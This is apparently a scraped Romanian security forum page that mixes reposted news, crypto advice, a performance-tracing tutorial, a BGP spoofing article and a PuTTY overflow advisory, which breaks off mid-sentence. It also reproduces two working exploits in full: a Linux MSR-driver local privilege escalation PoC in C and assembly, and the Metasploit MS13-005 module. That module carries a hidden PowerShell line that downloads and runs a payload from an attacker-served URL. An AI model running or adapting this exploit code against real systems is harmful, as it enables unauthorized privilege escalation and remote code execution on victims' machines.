Nytro

1. RC4 nu se compara cu AES. EVITA RC4! Nu stiu care e cel mai bun, dar daca pe schimbul de chei (asimetric) ai o cheie RSA de 2048 de biti iar pentru cryptarea simetrica, AES, ai 256 de biti, ar trebui sa fie de ajuns sa nu iti faci probleme. Sugerez totusi folosirea curbelor eliptice (ECDH) pentru schimb de chei, iar pentru cryptarea simetrica, sa se foloseasca GCM-ul ca mod de functionare pentru AES. 2. Deoarece cu cat un algoritm e mai simplu, cu atat e mai usor de "spart". Nu stiu sa iti zic de ce, dar eu iau in considerare posibilitatea ca in cazul in care se intercepteaza date, guvernele sa poata "sparge" traficul cryptat. Teoretic, folosesc asta pentru compatibilitate si cu browsere mai vechi si pentru viteza mai mare de incarcare a paginilor. 3. Daca te referi la algoritm de cryptare simetrica, e cam inutil si foarte lent, practic nu ar avea rost. In cel mai rau caz 512 biti pentru cheie sunt de ajuns. Gandeste-te cat timp ar lua sa incerce cineva 2^512 (2 la puterea 512) de combinatii pentru o cheie... 4. Stiu ca a fost un concurs pe NIST, pentru un algoritm care sa inlocuiasca SHA-ul. Rezultatul, cel mai bun algoritm ales, este Keccak, adica da, SHA3. Daca esti paranoic, folosesti versiunea pe 512 biti, dar nu stiu daca e chiar asa necesara, deoarece e o functie pentru calcularea unui hash, deci pentru asigurarea integritatii datelor, nu pentru protejarea acestora.

La final cred ca ar fi ok un examen din tot

Win32 Egg Hunter http://www.youtube.com/watch?v=c630azKzxeM&feature=player_embedded Description: Detailed Tutorial on Win32 Egg Hunter Implementation. Ajin Abraham @ajinabraham Kerala Cyber Force www.keralacyberforce.in Sursa: Win32 Egg Hunter

Feds Are Suspects in New Malware That Attacks Tor Anonymity By Kevin Poulsen 08.05.13 3:57 AM Security researchers tonight are poring over a piece of malicious software that takes advantage of a Firefox security vulnerability to identify some users of the privacy-protecting Tor anonymity network. The malware showed up Sunday morning on multiple websites hosted by the anonymous hosting company Freedom Hosting. That would normally be considered a blatantly criminal “drive-by” hack attack, but nobody’s calling in the FBI this time. The FBI is the prime suspect. “It just sends identifying information to some IP in Reston, Virginia,” says reverse-engineer Vlad Tsyrklevich. “It’s pretty clear that it’s FBI or it’s some other law enforcement agency that’s U.S.-based.” If Tsrklevich and other researchers are right, the code is likely the first sample captured in the wild of the FBI’s “computer and internet protocol address verifier,” or CIPAV, the law enforcement spyware first reported by WIRED in 2007. Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor. The code has been used sparingly in the past, which kept it from leaking out and being analyzed or added to anti-virus databases. The broad Freedom Hosting deployment of the malware coincides with the arrest of Eric Eoin Marques in Ireland on Thursday on an U.S. extradition request. The Irish Independent reports that Marques is wanted for distributing child pornography in a federal case filed in Maryland, and quotes an FBI special agent describing Marques as “the largest facilitator of child porn on the planet.” Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hactivist collective Anonymous singled out Freedom Hosting for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network. Freedom Hosting is a provider of turnkey “Tor hidden service” sites — special sites, with addresses ending in .onion — that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are ideal for websites that need to evade surveillance or protect users’ privacy to an extraordinary degree – which can include human rights groups and journalists. But it also naturally appeals to serious criminal elements. Shortly after Marques’ arrest last week, all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. That included websites that had nothing to do with child pornography, such as the secure email provider TorMail. Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address located in Virginia. By midday Sunday, the code was being circulated and dissected all over the net. Mozilla confirmed the code exploits a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser. Though many older revisions of Firefox are vulnerable to that bug, the malware only targets Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network. “The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based,” the non-profit Tor Project wrote in a blog post Sunday. “We’re investigating these bugs and will fix them if we can.” The inevitable conclusion is that the malware is designed specifically to attack the Tor browser. The strongest clue that the culprit is the FBI, beyond the circumstantial timing of Marques’ arrest, is that the malware does nothing but identify the target. The payload for the Tor Browser Bundle malware is hidden in a variable called “magneto”. The heart of the malicious Javascript is a tiny Windows executable hidden in a variable named “Magneto.” A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box. But the Magneto code doesn’t download anything. It looks up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sends it to the Virginia server, outside of Tor, to expose the user’s real IP address, and coded as a standard HTTP web request. “The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn’t allow them to download a backdoor or conduct any secondary activity,” says Tsyrklevich, who reverse-engineered the Magneto code. The malware also sends, at the same time, a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website. In short, Magneto reads like the x86 machine code embodiment of a carefully crafted court order authorizing an agency to blindly trespass into the personal computers of a large number of people, but for the limited purpose of identifying them. But plenty of questions remain. For one, now that there’s a sample of the code, will anti-virus companies start detecting it? Update 8.5.13 12:50: According to Domaintools, the malware’s command-and-control IP address in Virginia is allocated to Science Applications International Corporation. Based in McLean, Virginia, SAIC is a major technology contractor for defense and intelligence agencies, including the FBI. I have a call in to the firm. 13:50 Tor Browser Bundle users who installed or manually updated after June 26 are safe from the exploit, according to the Tor Project’s new security advisory on the hack. 14:30: SAIC has no comment. 15:10: There are incorrect press reports circulating that the command-and-control IP address belongs to the NSA. Those reports are based on a misreading of domain name resolution records. The NSA’s public website, NSA.gov, is served by the same upstream Verizon network as the Tor malware command-and-control server, but that network handles tons of government agencies and contractors in the Washington DC area. 8.6.13 17:10: SAIC’s link to the IP addresses may be an error in Domaintools’ records. The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related addresses are not part of SAIC’s publicly-listed allocation. They’re part of a ghost block of eight IP addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway. (Hat tip: Michael Tigas) Sursa: Feds Are Suspects in New Malware That Attacks Tor Anonymity | Threat Level | Wired.com

Da, e super, pacat ca foloseste MHook, era mai 1337 fara sa foloseasca...

CAZUL DE SPIONAJ INFORMATIC: Un server apar?inând NSA s-ar afla ?i în România. HARTA ??rilor în care ar exista servere de Valentin Vidu - Mediafax Site-ul Cryptome.org a publicat o list? de ??ri ?i un planiglob pe care sunt marcate puncte ro?ii despre care afirm? c? "ar putea fi locuri simbolice sau ar putea indica (existen?a) unor servere X-Keyscore apar?inând NSA la ambasade ale Statelor Unite", inclusiv în România. Potrivit site-ului, care nu precizeaz? vreo surs?, de?i unele locuri în care se afl? servere sunt cunoscute ca "sta?ii de spionaj NSA-Echeleon în cadrul Five-Eyes - Statele Unite, Marea Britanie, Canada, Australia ?i Noua Zeeland? -, multe dintre locurile serverelor sunt marcate în capitalele acestor state sau în apropiere de capitale". Site-ul consider? o "surpriz?" punctul de la Moscova ?i noteaz? c? alt punct apare în partea central? din sudul Chinei, departe de Beijing, apreciind c? ar fi un "server clandestin". De asemenea, site-ul remarc?c? sta?ia NSA din Hawaii, unde a lucrat Edward Snowden, nu apare pe hart?. Pe planiglob sunt marcate aproximativ 85 de puncte în care s-ar afla "aproximativ 150 de situri", 25 de puncte aflându-se pe coastele Antarcticii. Puncte ro?ii apar, de asemenea, în 51 de ??ri. Cea mai dens? concentrare este în Europa, Orientul Mijlociu, Asia de Sud ?i America Central?, observ? site-ul, care subliniaz? c? "niciunul nu apare în zone ca Norvegia, Suedia, Islanda, Canada, în cea mai parte din America de Sud, Pacific ?i insulele din Atlantic. Cryptome.org consider? c? "ar fi logic ca Agen?ia Na?ional? american? pentru Securitate (NSA) s? utilizeze ambasadele americane ca pe avanposturi pentru colectarea (datelor) comunica?iilor locale cu ajutorul X-Keyscore", notând c? ambasadele au fost folosite pentru "întregul spectru al spionajului în toate formele ?i deghiz?rile sale, militar, politic, economic, social" ?i conchizând c? "ad?ugarea aspectului cibernetic era inevitabil?". Site-ul argumenteaz? c? ambasadele de?in re?ele multiple de comunicare de la cele mai de jos nivele de securitate, pân? la cele mai înalte. Aceea?i surs? adaug? c? alte noi dezv?luiri de documente provenind de la Edward Snowden ar putea s? descrie cum este realizat acest lucru de c?tre personal, re?ele ?i arhitectura serverelor de date, nu doar prin programele PRISM ?i X-Keyscore. Cryptome.org este o bibliotec? digital? pentru g?zduire, creat? în 1996 de c?tre cercet?tori americani independen?i ?i arhitec?ii John Young ?i Deborah Natsios. Biblioteca func?ioneaz? ca loc de stocare a unor informa?ii despre libertatea de exprimare, criptografie, spionaj ?i supraveghere. Cryptome î?i asum? ca misiune, pe site, "s? primeasc? spre publicare documente care sunt interzise de guverne în întreaga lume, în particular materiale despre libertatea de exprimare, confiden?ialitate, criptologie, tehnologii cu dubl? utilizare, securitatea na?ional?, informa?ii (secrete) ?i guvernan?? secret? - documente declasificate, secrete ?i clasificate - dar nu se limiteaz? doar la acestea". Sursa: CAZUL DE SPIONAJ INFORMATIC: Un server apar?inând NSA s-ar afla ?i în România. HARTA ??rilor în care ar exista servere - Mediafax

Da, tot 17 ramane, dar include patch-urile necesare: https://blog.torproject.org/blog/tor-security-advisory-old-tor-browser-bundles-vulnerable

Da. Cei care inca nu aveti Firefox 22 ati face bine sa faceti update. Si e un exemplu bun de a contrazice "Firefox e mai sigur ca IE". Bine, folositi Chrome.

[h=1]Linux Kernel 'MSR' Driver Local Privilege Escalation[/h] // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host// can do whatever in the commented area, re-enable module support, etc // requires CONFIG_X86_MSR and just uid 0 // a small race exists between the time when the MSR is written to the first // time and when we issue our sysenter // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed // configured to take a hex arg of a dword pointer to set to 0 // (modules_disabled, selinux_enforcing, take your pick) // // Hello to Red Hat, who has shown yet again to not care until a // public exploit is released. Not even a bugtraq entry existed in // their system until this was published -- and they have a paid team // of how many? // It's not as if I didn't mention the problem and existence of an easy // exploit multiple times prior: // // // // // // // // spender 2013 #define _GNU_SOURCE #include <stdio.h> #include <sched.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdlib.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/mman.h> #define SYSENTER_EIP_MSR 0x176 u_int64_t msr; unsigned long ourstack[65536]; u_int64_t payload_data[16]; extern void *_ring0; extern void *_ring0_end; void ring0(void) { __asm volatile(".globl _ring0\n" "_ring0:\n" ".intel_syntax noprefix\n" ".code64\n" // set up stack pointer with 'ourstack' "mov esp, ecx\n" // save registers, contains the original MSR value "push rax\n" "push rbx\n" "push rcx\n" "push rdx\n" // play with the kernel here with interrupts disabled! "mov rcx, qword ptr [rbx+8]\n" "test rcx, rcx\n" "jz skip_write\n" "mov dword ptr [rcx], 0\n" "skip_write:\n" // restore MSR value before returning "mov ecx, 0x176\n" // SYSENTER_EIP_MSR "mov eax, dword ptr [rbx]\n" "mov edx, dword ptr [rbx+4]\n" "wrmsr\n" "pop rdx\n" "pop rcx\n" "pop rbx\n" "pop rax\n" "sti\n" "sysexit\n" ".code32\n" ".att_syntax prefix\n" ".global _ring0_end\n" "_ring0_end:\n" ); } unsigned long saved_stack; int main(int argc, char *argv[]) { cpu_set_t set; int msr_fd; int ret; u_int64_t new_msr; struct sched_param sched; u_int64_t resolved_addr = 0ULL; if (argc == 2) resolved_addr = strtoull(argv[1], NULL, 16); /* can do this without privilege */ mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0); mlock(&payload_data, sizeof(payload_data)); CPU_ZERO(&set); CPU_SET(0, &set); sched.sched_priority = 99; ret = sched_setscheduler(0, SCHED_FIFO, &sched); if (ret) { fprintf(stderr, "Unable to set priority.\n"); exit(1); } ret = sched_setaffinity(0, sizeof(cpu_set_t), &set); if (ret) { fprintf(stderr, "Unable to set affinity.\n"); exit(1); } msr_fd = open("/dev/cpu/0/msr", O_RDWR); if (msr_fd < 0) { msr_fd = open("/dev/msr0", O_RDWR); if (msr_fd < 0) { fprintf(stderr, "Unable to open /dev/cpu/0/msr\n"); exit(1); } } lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET); ret = read(msr_fd, &msr, sizeof(msr)); if (ret != sizeof(msr)) { fprintf(stderr, "Unable to read /dev/cpu/0/msr\n"); exit(1); } // stuff some addresses in a buffer whose address we // pass to the "kernel" via register payload_data[0] = msr; payload_data[1] = resolved_addr; printf("Old SYSENTER_EIP_MSR = %016llx\n", msr); fflush(stdout); lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET); new_msr = (u_int64_t)(unsigned long)&_ring0; printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr); fflush(stdout); ret = write(msr_fd, &new_msr, sizeof(new_msr)); if (ret != sizeof(new_msr)) { fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n"); exit(1); } __asm volatile( ".intel_syntax noprefix\n" ".code32\n" "mov saved_stack, esp\n" "lea ecx, ourstack\n" "lea edx, label2\n" "lea ebx, payload_data\n" "sysenter\n" "label2:\n" "mov esp, saved_stack\n" ".att_syntax prefix\n" ); printf("Success.\n"); return 0; } Sursa: Linux Kernel 'MSR' Driver Local Privilege Escalation

[h=1]MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation[/h] ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Exploit::FileDropper include Msf::Post::File def initialize(info={}) super( update_info( info, 'Name' => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation', 'Description' => %q{ The Windows kernel does not properly isolate broadcast messages from low integrity applications from medium or high integrity applications. This allows commands to be broadcasted to an open medium or high integrity command prompts allowing escalation of privileges. We can spawn a medium integrity command prompt, after spawning a low integrity command prompt, by using the Win+Shift+# combination to specify the position of the command prompt on the taskbar. We can then broadcast our command and hope that the user is away and doesn't corrupt it by interacting with the UI. Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, RT. But Spawning a command prompt with the shortcut key does not work in Vista so you will have to check if the user is already running a command prompt and set SPAWN_PROMPT false. The WEB technique will execute a powershell encoded payload from a Web location. The FILE technique will drop an executable to the file system, set it to medium integrity and execute it. The TYPE technique will attempt to execute a powershell encoded payload directly from the command line but it may take some time to complete. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Discovery 'Axel Souchet', # @0vercl0k POC 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> "Nov 27 2012", 'References' => [ [ 'CVE', '2013-0008' ], [ 'MSB', 'MS13-005' ], [ 'OSVDB', '88966'], [ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ] ] )) register_options( [ OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]), OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]), OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type']) ], self.class ) end def low_integrity_level? tmp_dir = expand_path("%USERPROFILE%") cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin session.shell_command_token("mkdir #{new_dir}") rescue return true end if directory?(new_dir) session.shell_command_token("rmdir #{new_dir}") return false else return true end end def win_shift(number) vk = 0x30 + number bscan = 0x81 + number client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) client.railgun.user32.keybd_event(vk, bscan, 0, 0) client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) end def count_cmd_procs count = 0 client.sys.process.each_process do |proc| if proc['name'] == 'cmd.exe' count += 1 end end vprint_status("Cmd prompt count: #{count}") return count end def cleanup if datastore['SPAWN_PROMPT'] and @hwin vprint_status("Rehiding window...") client.railgun.user32.ShowWindow(@hwin, 0) end super end def exploit # First of all check if the session is running on Low Integrity Level. # If it isn't doesn't worth continue print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level? # If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which # hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low # integrity process can write. drop_to_fs = false if datastore['TECHNIQUE'] == 'FILE' payload_file = "#{rand_text_alpha(5+rand(3))}.exe" begin tmp_dir = expand_path("%TEMP%") tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i cd(tmp_dir) print_status("Trying to drop payload to #{tmp_dir}...") if write_file(payload_file, generate_payload_exe) print_good("Payload dropped successfully, exploiting...") drop_to_fs = true register_file_for_cleanup(payload_file) payload_path = tmp_dir else print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.") drop_to_fs = false end rescue ::Rex::Post::Meterpreter::RequestError print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.") drop_to_fs = false end end if drop_to_fs command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}" make_it(command) elsif datastore['TECHNIQUE'] == 'TYPE' if datastore['CUSTOM_COMMAND'] command = datastore['CUSTOM_COMMAND'] else print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload") command = cmd_psh_payload(payload.encoded) end make_it(command) else super end end def primer url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}" make_it(command) end def make_it(command) if datastore['SPAWN_PROMPT'] @hwin = client.railgun.kernel32.GetConsoleWindow()['return'] if @hwin == nil @hwin = client.railgun.user32.GetForegroundWindow()['return'] end client.railgun.user32.ShowWindow(@hwin, 0) client.railgun.user32.ShowWindow(@hwin, 5) # Spawn low integrity cmd.exe print_status("Spawning Low Integrity Cmd Prompt") windir = client.fs.file.expand_path("%windir%") li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid count = count_cmd_procs spawned = false print_status("Bruteforcing Taskbar Position") 9.downto(1) do |number| vprint_status("Attempting Win+Shift+#{number}") win_shift(number) sleep(1) if count_cmd_procs > count print_good("Spawned Medium Integrity Cmd Prompt") spawned = true break end end client.sys.process.kill(li_cmd_pid) fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned end print_status("Broadcasting payload command to prompt... I hope the user is asleep!") command.each_char do |c| print c if command.length < 200 client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0) end print_line print_status("Executing command...") client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0) end def on_request_uri(cli, request) print_status("Delivering Payload") data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end end Sursa: MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation

[h=1]Defrag Tools: #50 - WPT - Memory Analysis - Heap[/h] Posted: 14 hours ago By: Larry Larsen, Andrew Richards, Chad Beeder [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, Windows Phone, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 11.7 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 75.4 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 38.7 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 163.7 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 114.4 MB High Quality WMV (PC, Xbox, MCE) In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue walking you through the Windows Performance Toolkit (WPT). This is part 3 of 3 episodes on memory usage/leaks. Example xPerf scripts. Resources: Aaron Margosis VirtMemTest Timeline: [00:00] - 50th Episode of Defrag Tools! [01:20] - Attach: xperf -start HeapSession -heap -pids %1 -stackwalk ... [03:28] - VirtMemTest [04:54] - WPA [06:22] - Type - Allocated Inside (AI) & Outside (AO), Freed Inside (FI) & Outside (FO) [07:20] - Launch: Image File Execution Options [07:51] - Launch: xperf -start HeapSession -heap -pids 0 -stackwalk ... [08:40] - Registry Editor - IFEO [10:26] - WPA [11:06] - Type - Allocated Inside (AI) & Outside (AO), Freed Inside (FI) & Outside (FO) [11:25] - Summary - AIFO Example: "xperf - Collect Heap_Attach.cmd" @echo off echo Press a key when ready to start... pause echo . echo ...Capturing... echo . xperf -on PROC_THREAD+LOADER+VIRT_ALLOC -stackwalk VirtualAlloc+VirtualFree -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular xperf -start HeapSession -heap -pids %1 -stackwalk HeapAlloc+HeapRealloc -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular echo Press a key when you want to stop... pause echo . echo ...Stopping... echo . xperf -stop -stop HeapSession -d heap.etl Example: "xperf - Collect Heap_Launch.cmd" @echo off echo Press a key when ready to start... pause echo . echo ...Capturing... echo . rem Add the process to IFEO reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%1.exe" /v TracingFlags /t REG_DWORD /d 1 /f xperf -on PROC_THREAD+LOADER+VIRT_ALLOC -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -stackwalk VirtualAlloc xperf -start HeapSession -heap -pids 0 -stackwalk HeapAlloc+HeapRealloc -BufferSize 1024 -MinBuffers 256 -MaxBuffers 256 -MaxFile 256 -FileMode Circular echo Press a key when you want to stop... pause echo . echo ...Stopping... echo . xperf -stop HeapSession -stop -d heap.etl rem Remove the process from IFEO reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%1.exe" /v TracingFlags /f Sursa: Defrag Tools: #50 - WPT - Memory Analysis - Heap | Defrag Tools | Channel 9

BGP spoofing - why nothing on the internet is actually secure Summary: A skilled attacker with access to the right router can co-opt routes to destination IP address. When this happens, nothing on the internet is trustworthy. And there's no way to stop it. By Larry Seltzer for Zero Day | August 6, 2013 -- 04:00 GMT (21:00 PDT) The scariest hack of them all on the internet has been around for a long time, but it doesn't get a lot of attention in the broader tech press. It's BGP spoofing and it compromises the most basic functions of the internet: the routing of data from one system to another. Effective use of BGP spoofing is not within the reach of script kiddies, but there's a lot of it going on. How much? Nobody knows and nobody can know. It's possible to detect that an attack is going on, but it's impossible to prevent it and it may be difficult to stop an attack in progress. I spoke with Dave Rand, Technical Fellow at Trend Micro. Back in the mid-90's Rand worked at an ISP and first encountered BGP spoofing used to facilitate spamming. The routing in the mail headers of the spam looked particularly genuine because all the addresses were correct. At the bottom of it was a compromised router at an ISP. I've spoken to Dave many times over the years about BGP spoofing. He's always considered it a very serious problem that is fundamentally insolvable and I'd like to thank him for all the information below. How is all this possible? It starts with the very basics of how the internet works. The internet is a network of networks. Routers are used to move data between networks according to IP addresses that are stored in their routing tables. Routers will advertise to each other that they use certain addresses. But — and this is very important — there is no authority to check to confirm that a particular address belongs to a particular network. There are organizations, such as RIPE in Europe and ARIN for the US and Canada, which allocate IP addresses (all they have left is IPv6 addresses), but there's no where you can check to confirm an allocation authoritatively. Because of this, the updating of routing tables is done entirely on trust. Consider this simplistic example: ISP1 has the address space 1.0.0.0/8 and ISP2 has 2.0.0.0/8. They each advertise their space to the other. Now ISP3 advertises 3.0.0.0/8 to ISP1 and asks ISP1 to advertise its addresses, which it does. ISP1 becomes a transit provider for ISP3, a service for which ISP3 pays ISP1. But ISP1 has no real way to confirm that ISP3's advertisements are accurate. Here's another important point: shorter routes get higher priority from the router. If ISP3 were to advertise a small subset of addresses to ISP1 with shorter paths than what ISP1 already had, ISP1 would follow those routes instead of what was already in the routing table. It's important to note that in order to execute this attack you need control of an ISP router. You might think that this would be hard to do, and it's harder than it used to be, but it's not impossible. It's still possible to find routers with default admin passwords or passwords on a common dictionary list. And once you do and take control, there's nothing to stop you from advertising Bank of America addresses on your network. I suspect that the large majority of erroneous advertisements are, well, erroneous. They're not malicious, they're just screwups. There was a recent incident where some bad routes in NedZone Internet BV's network included Amazon.com and a bunch of big banks. It looks way too brazen to be an attack. If you really wanted to be effective and surreptitious with such an attack you'd be lower-profile. You'd attack the router of a small or mid-size ISP and you'd only advertise it for a short time, but during that time you'd have other attacks, like cross-site scripting and targeted spam, ongoing against that ISP's users. When they attempt to communicate with their bank or retailer they will instead go to your servers; you can spoof those servers, see the cookies, it all depends on how ornate you want to get, but all you really need is to get users to log on to the site, which can satisfy SSL and get the little lock icon because the attacker can control those addresses too. Once you have validated logins for those accounts you can sell them for a lot. Sometimes malicious attacks are not for profit, but just network vandalism. In 2008 there was a dispute between YouTube and the government of Pakistan about certain content. Sometime later false BGP routes pointed YouTube traffic in much of Europe to Pakistan Telecom, stealing traffic from YouTube but also flooding Pakistan Telecom with all of YouTube's traffic. RIPE, the regional internet registry for Europe, has . After an attack like this there may be no footprints left. Nobody logs router advertisements. There are groups that log and analyze the global routing table, such as the fascinating CIDR Report, and look for routes that don't make sense. But these only catch changes that propagate out to the global routing table. A transient advertisement which only goes to an ISP's peer and not a transit provider won't get to the global table. And even if it does, by the time anyone can see what's going on it will be too late. It's impossible to block BGP spoofing attacks in a consistent, automated fashion, but it is possible to apply some common sense and experience, what you might call heuristics, to determine that a route isn't kosher. If a small ISP in Brazil starts advertising routes to PayPal then an experienced CNE might think twice about replicating it. But these things don't usually get vetted by a human being; there's too much going on. All ISPs advertise their routes to the other networks to which they connect and these companies (there are 30 or 40 thousand ISPs now) have a relationship and contracts, so they trust each other. And if they wanted to check the addresses they couldn't; there's no authoritative place to check. You might complain that best administration practices, such as good route filtering, would prevent these attacks, and there's something to that. You can certainly prevent a lot of them with best practices. There are other practices that can make it harder to exploit such attacks successfully, such as using strong encryption and authentication for all local traffic, but there's no technique that will block these attacks in all cases. If you find out that an ISP has bogus routes to your network what can you do? All you can do is call them and ask them (nicely or otherwise) to withdraw the route, but you can't make them. If they don't respond adequately you can complain to their upstream providers and ask them to block the route, but once again there is no official mechanism for doing this because there is no authority in charge of it, and you probably don't even have a relationship with the ISP to which you're complaining. Of all the attacks happening under the radar on the internet, the most dangerous ones are likely based on BGP spoofing. It's the best reason to assume that a lot more network compromising, by criminal and government actors, is happening than is officially acknowledged, and even the officials don't really know how much is happening. What can be done? If Dave Rand doesn't know then I sure don't. Sursa: BGP spoofing - why nothing on the internet is actually secure | ZDNet

PuTTY 0.62 Heap Overflow Authored by Gergely Eberhardt PuTTY versions 0.62 and below suffer from an SSH handshake heap overflow vulnerability. PuTTY SSH handshake heap overflow (CVE-2013-4852) Description: PuTTY versions 0.62 and earlier - as well as all software that integrates these versions of PuTTY - are vulnerable to an integer overflow leading to heap overflow during the SSH handshake before authentication, caused by improper bounds checking of the length parameter received from the SSH server. This allows remote attackers to cause denial of service, and may have more severe impact on the operation of software that uses PuTTY code. Affected software products: - PuTTY up to and including 0.62 - WinSCP before 5.1.6 - all other software that uses vulnerable (revision 9895 or earlier) PuTTY code Details: A malformed size value in the SSH handshake could cause an integer overflow, as the getstring() function in sshrsa.c and sshdss.c read the handshake message length without checking that it was not a negative number. Specifically, the bignum_from_bytes() function invoked by getstring() received a data buffer along with its length represented by a signed integer (nbytes) and performed the following arithmetical operation before allocating memory to store the buffer: w = (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes->words */ result = newbn(w); If the value of nbytes was -1 (0xffffffff), the value of w would overflow to a very small positive number (depending on the value of BIGNUM_INT_BYTES), causing newbn() to reserve a very small memory area. Then a large number of bytes would be copied into the data buffer afterwards, resulting in a heap overflow. Similarly, if nbytes was chosen so that w would be -1, the newbn() function would allocate zero bytes in memory via snewn() and attempt to write the size of the Bignum (in four bytes) into the allocated zero-byte area, also resulting in a heap overflow. Consequences: In the standalone PuTTY client the attacker does not have precise control over the memory corruption, so this bug can only cause a local denial-of-service (crash). However, in other software that uses PuTTY code, such heap corruption could have more severe effects. Specifically in case of WinSCP, this 